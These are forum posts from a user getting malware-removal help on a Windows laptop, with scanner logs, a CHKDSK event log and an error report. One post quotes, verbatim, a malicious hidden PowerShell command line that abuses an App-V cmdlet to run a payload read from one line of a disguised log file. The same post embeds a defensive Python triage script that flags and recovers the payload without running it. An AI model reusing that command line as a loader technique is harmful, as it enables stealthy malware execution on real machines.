
EffWerd


Posts posted by EffWerd

  1. Hi Maurice,

    Thanks a lot for your help with this.

    I ran the MS Safety Scanner, which went fine for 3.5 hours, then just stalled out on a particular file... I sat there for another hour to see if it would pick up again, but no luck.

    It did create the msert.log, but nothing of value in it, it seems (attached).

    [Screenshot attached: MSSafetyScannerStall.png]

    So I went ahead and ran the FRST fix - log is attached.

    The powershell.exe process didn't return after the reboot, so that's good. Interesting how hidden the whole thing is - I think for sure it was definitely something malicious; I did see it trying to scan for what I assume are crypto wallet folders at one stage in Procmon (I forgot to take a screenshot though...)

    Let me know if you think I should try to re-run the MS Safety Scanner tool - it did count 24 'infected' files before stalling out.

    Cheers!  Let me know if you have a ko-fi account or something, I'll buy you a coffee or two for your help :)


    Fixlog.txt msert.log

  2. Hi,

    I've got an instance of powershell.exe which keeps coming back and seems to be up to no good.

    It's using a bit of system resources and has a bit of a suspect command line attached to it.

    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer  n; $a = Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;iex $a;hackbacktrack ko8E7GIIPGwUKDdghNlVPuHA6yXABLHxKS1UBSVQI34=}

    It also seems to be pinging a server and scanning through the file system if I watch it with Procmon.

    I can kill the process and it doesn't start back up until Windows is restarted. I can't see anything obvious in Autoruns.

    I have run Windows Defender and Malwarebytes scans but with no result. I have attached the FRST results.

    Thanks in advance if you can help.


    Addition.txt FRST.txt
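A triage helper for the command line quoted in the post above, written here as an added example; it is not code from the thread or from any of the tools mentioned (FRST, Procmon, Autoruns). It does not execute anything: it parses the command line, flags the indicators a responder would look for (hidden window, non-interactive session, `iex`, a payload read out of a file by line index, a long base64-looking argument), and then pulls that staged line back out of the file the one-liner reads. The contents of C:\Windows\logs\system-logs.txt were not posted, so a constructed stand-in is built inline; the placeholder line it contains, the indicator patterns, and the assumption that `hackbacktrack` is a function defined by the staged line are all assumptions of this example. It generalises slightly beyond the posted one-liner by also recognising the `gc`/`cat`/`type` aliases of Get-Content and the full `Select-Object` name.

```python
"""Offline triage of a suspicious powershell.exe command line (added example).

Nothing here runs PowerShell. The command line is the one quoted in the post;
the 'log' file it reads from was not posted, so build_constructed_log() creates
a stand-in with a placeholder line at the same index.
"""
import re

# Verbatim command line from the post.
SAMPLE_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive '
    r'-WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command '
    r'&{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); '
    r'import-module AppvClient; Sync-AppvPublishingServer  n; '
    r'$a = Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;'
    r'iex $a;hackbacktrack ko8E7GIIPGwUKDdghNlVPuHA6yXABLHxKS1UBSVQI34=}'
)

# "read one line of a file by index" staging pattern: Get-Content (or an alias)
# piped into Select/Select-Object -Index N. The index is zero-based in PowerShell.
STAGING_RE = re.compile(
    r"(?<![\w-])(?:Get-Content|gc|cat|type)\s+(?P<path>\S+)\s*\|\s*"
    r"(?:Select|Select-Object)\s+-Index\s+(?P<index>\d+)",
    re.IGNORECASE,
)

# Indicator patterns (assumptions of this example, not a vendor signature set).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "non_interactive": re.compile(r"-noni(?:nteractive)?\b", re.IGNORECASE),
    "invoke_expression": re.compile(
        r"(?<![\w-])(?:iex|invoke-expression)(?![\w-])", re.IGNORECASE),
    "payload_staged_in_file": STAGING_RE,
    "appv_publishing_sync": re.compile(r"Sync-AppvPublishingServer", re.IGNORECASE),
    # A long base64-alphabet run passed as an argument (here, to 'hackbacktrack').
    "long_base64_argument": re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{32,}={0,2}"),
}


def score_cmdline(cmdline: str) -> list[str]:
    """Return the names of every indicator that fires on the command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def extract_staging(cmdline: str):
    """Return (path, zero_based_index) of the file line the one-liner will iex, or None."""
    m = STAGING_RE.search(cmdline)
    if not m:
        return None
    return m.group("path"), int(m.group("index"))


def recover_staged_line(file_text: str, index: int):
    """Return the line Select-Object -Index <index> would yield (zero-based), or None if out of range."""
    lines = file_text.splitlines()
    if 0 <= index < len(lines):
        return lines[index]
    return None


def build_constructed_log(index: int) -> str:
    """Constructed stand-in for the system-logs.txt file (the real one was not posted).

    Filler 'log' lines with a placeholder PowerShell function at the given
    zero-based index. The placeholder is NOT the real payload, which is unknown.
    """
    filler = "2016-11-21 03:18:22 INFO service heartbeat ok"
    lines = [filler] * (index + 5)
    lines[index] = (
        'function hackbacktrack { param($blob) '
        'Write-Output "constructed placeholder, real payload unknown: $blob" }'
    )
    return "\n".join(lines)


def triage(cmdline: str, file_text: str) -> dict:
    """Run the indicator checks and, if a staging pattern is present, recover the staged line."""
    staged = extract_staging(cmdline)
    staged_line = recover_staged_line(file_text, staged[1]) if staged else None
    return {"indicators": score_cmdline(cmdline), "staging": staged, "staged_line": staged_line}


if __name__ == "__main__":
    path, idx = extract_staging(SAMPLE_CMDLINE)
    result = triage(SAMPLE_CMDLINE, build_constructed_log(idx))
    for key, value in result.items():
        print(f"{key}: {value}")
    # On a real system you would read the actual file at `path` (never iex it) and
    # note that index 17033 is line 17034 in an editor, since -Index is zero-based.
```

Two points the script encodes that matter when looking at this by hand: `Select -Index` is zero-based, so the line to inspect in the file is the 17034th one in an editor; and `-ExecutionPolicy` governs script files, not text passed via `-Command` and `iex`, so it provides no control here. The staged line is worth keeping alongside the rest of the file, because a payload hidden at one index of an otherwise ordinary-looking log file is exactly why Autoruns shows nothing obvious.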

  3. Logs as requested:


    Log Name:      Application
    Source:        Microsoft-Windows-Wininit
    Date:          21/11/2016 3:18:22 AM
    Event ID:      1001
    Task Category: None
    Level:         Information
    Keywords:      Classic
    User:          N/A
    Computer:      Kevslaptop
    Description:


    Checking file system on C:
    The type of the file system is NTFS.
    Volume label is Windows.

    A disk check has been scheduled.
    Windows will now check the disk.                         

    Stage 1: Examining basic file system structure ...
      492032 file records processed.                                                        
    File verification completed.
      16758 large file records processed.                                  
      0 bad file records processed.                                    

    Stage 2: Examining file name linkage ...
      592928 index entries processed.                                                      
    Index verification completed.
      0 unindexed files scanned.                                        
      0 unindexed files recovered to lost and found.                    

    Stage 3: Examining security descriptors ...
    Cleaning up 13 unused index entries from index $SII of file 0x9.
    Cleaning up 13 unused index entries from index $SDH of file 0x9.
    Cleaning up 13 unused security descriptors.
    Security descriptor verification completed.
      50449 data files processed.                                          
    CHKDSK is verifying Usn Journal...
      40892616 USN bytes processed.                                                          
    Usn Journal verification completed.

    Stage 4: Looking for bad clusters in user file data ...
      492016 files processed.                                                              
    File data verification completed.

    Stage 5: Looking for bad, free clusters ...
      94295914 free clusters processed.                                                      
    Free space verification is complete.
    CHKDSK discovered free space marked as allocated in the
    master file table (MFT) bitmap.

    Windows has made corrections to the file system.
    No further action is required.

     953325770 KB total disk space.
     575342392 KB in 245807 files.
        163780 KB in 50450 indexes.
             0 KB in bad sectors.
        635938 KB in use by the system.
         65536 KB occupied by the log file.
     377183660 KB available on disk.

          4096 bytes in each allocation unit.
     238331442 total allocation units on disk.
      94295915 allocation units available on disk.

    Internal Info:
    00 82 07 00 b4 84 04 00 7d 2b 08 00 00 00 00 00  ........}+......
    31 02 01 00 fb 7b 00 00 00 00 00 00 00 00 00 00  1....{..........

    Windows has finished checking your disk.
    Please wait while your computer restarts.

    Event Xml:
    <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
      <System>
        <Provider Name="Microsoft-Windows-Wininit" Guid="{206f6dea-d3c5-4d10-bc72-989f03c8b84b}" EventSourceName="Wininit" />
        <EventID Qualifiers="16384">1001</EventID>
        <Version>0</Version>
        <Level>4</Level>
        <Task>0</Task>
        <Opcode>0</Opcode>
        <Keywords>0x80000000000000</Keywords>
        <TimeCreated SystemTime="2016-11-20T14:18:22.895205100Z" />
        <EventRecordID>5745</EventRecordID>
        <Correlation />
        <Execution ProcessID="0" ThreadID="0" />
        <Channel>Application</Channel>
        <Computer>Kevslaptop</Computer>
        <Security />
      </System>
      <EventData>
        <Data>

    Checking file system on C:
    The type of the file system is NTFS.
    Volume label is Windows.

    A disk check has been scheduled.
    Windows will now check the disk.                         

    Stage 1: Examining basic file system structure ...
      492032 file records processed.                                                        
    File verification completed.
      16758 large file records processed.                                  
      0 bad file records processed.                                    

    Stage 2: Examining file name linkage ...
      592928 index entries processed.                                                      
    Index verification completed.
      0 unindexed files scanned.                                        
      0 unindexed files recovered to lost and found.                    

    Stage 3: Examining security descriptors ...
    Cleaning up 13 unused index entries from index $SII of file 0x9.
    Cleaning up 13 unused index entries from index $SDH of file 0x9.
    Cleaning up 13 unused security descriptors.
    Security descriptor verification completed.
      50449 data files processed.                                          
    CHKDSK is verifying Usn Journal...
      40892616 USN bytes processed.                                                          
    Usn Journal verification completed.

    Stage 4: Looking for bad clusters in user file data ...
      492016 files processed.                                                              
    File data verification completed.

    Stage 5: Looking for bad, free clusters ...
      94295914 free clusters processed.                                                      
    Free space verification is complete.
    CHKDSK discovered free space marked as allocated in the
    master file table (MFT) bitmap.

    Windows has made corrections to the file system.
    No further action is required.

     953325770 KB total disk space.
     575342392 KB in 245807 files.
        163780 KB in 50450 indexes.
             0 KB in bad sectors.
        635938 KB in use by the system.
         65536 KB occupied by the log file.
     377183660 KB available on disk.

          4096 bytes in each allocation unit.
     238331442 total allocation units on disk.
      94295915 allocation units available on disk.

    Internal Info:
    00 82 07 00 b4 84 04 00 7d 2b 08 00 00 00 00 00  ........}+......
    31 02 01 00 fb 7b 00 00 00 00 00 00 00 00 00 00  1....{..........

    Windows has finished checking your disk.
    Please wait while your computer restarts.
    </Data>
      </EventData>
    </Event>


    sfcdetails.txt

  4. Hi,

    I'm having issues getting MBAM or MBAM Clean to run.  I keep getting this error "the application was unable to start correctly 0xc0000279".

    It seems to be affecting only the operation of MBAM; however, no other malware detection programs seem to be able to pick up on anything.

    I usually only run MBAM and Windows Defender, but I downloaded AVG and tried scanning with that and also the ESET online scanner which turned up nothing.

    I've tried running Rkill and TDSSKiller, and also FRST both inside and outside of Windows.

    Computer specs:

    OS Name    Microsoft Windows 10 Home
    Version    10.0.14393 Build 14393
    Other OS Description     Not Available
    OS Manufacturer    Microsoft Corporation
    System Name    KEVSLAPTOP
    System Manufacturer    Hewlett-Packard
    System Model    HP ENVY 17 Notebook PC
    System Type    x64-based PC
    System SKU    F7P64PA#ABG
    Processor    Intel(R) Core(TM) i7-4700MQ CPU @ 2.40GHz, 2401 Mhz, 4 Core(s), 8 Logical Processor(s)
    BIOS Version/Date    Insyde F.68, 22/07/2016
    SMBIOS Version    2.7
    Embedded Controller Version    147.82
    BIOS Mode    UEFI
    BaseBoard Manufacturer    Hewlett-Packard
    BaseBoard Model    Not Available
    BaseBoard Name    Base Board
    Platform Role    Mobile
    Secure Boot State    On
    PCR7 Configuration    Binding Not Possible
    Windows Directory    C:\WINDOWS
    System Directory    C:\WINDOWS\system32
    Boot Device    \Device\HarddiskVolume2
    Locale    New Zealand
    Hardware Abstraction Layer    Version = "10.0.14393.206"
    User Name    Kevslaptop\Kevin
    Time Zone    New Zealand Daylight Time
    Installed Physical Memory (RAM)    8.00 GB
    Total Physical Memory    7.93 GB
    Available Physical Memory    5.50 GB
    Total Virtual Memory    9.18 GB
    Available Virtual Memory    6.63 GB
    Page File Space    1.25 GB
    Page File    C:\pagefile.sys
    Hyper-V - VM Monitor Mode Extensions    Yes
    Hyper-V - Second Level Address Translation Extensions    Yes
    Hyper-V - Virtualization Enabled in Firmware    No
    Hyper-V - Data Execution Protection    Yes

    Log files are attached.

    Any help would be much appreciated.

    Cheers

    Addition.txt

    FRST.txt

    Rkill.txt

    Addition - recovery mode.txt

    FRST - recovery mode.txt
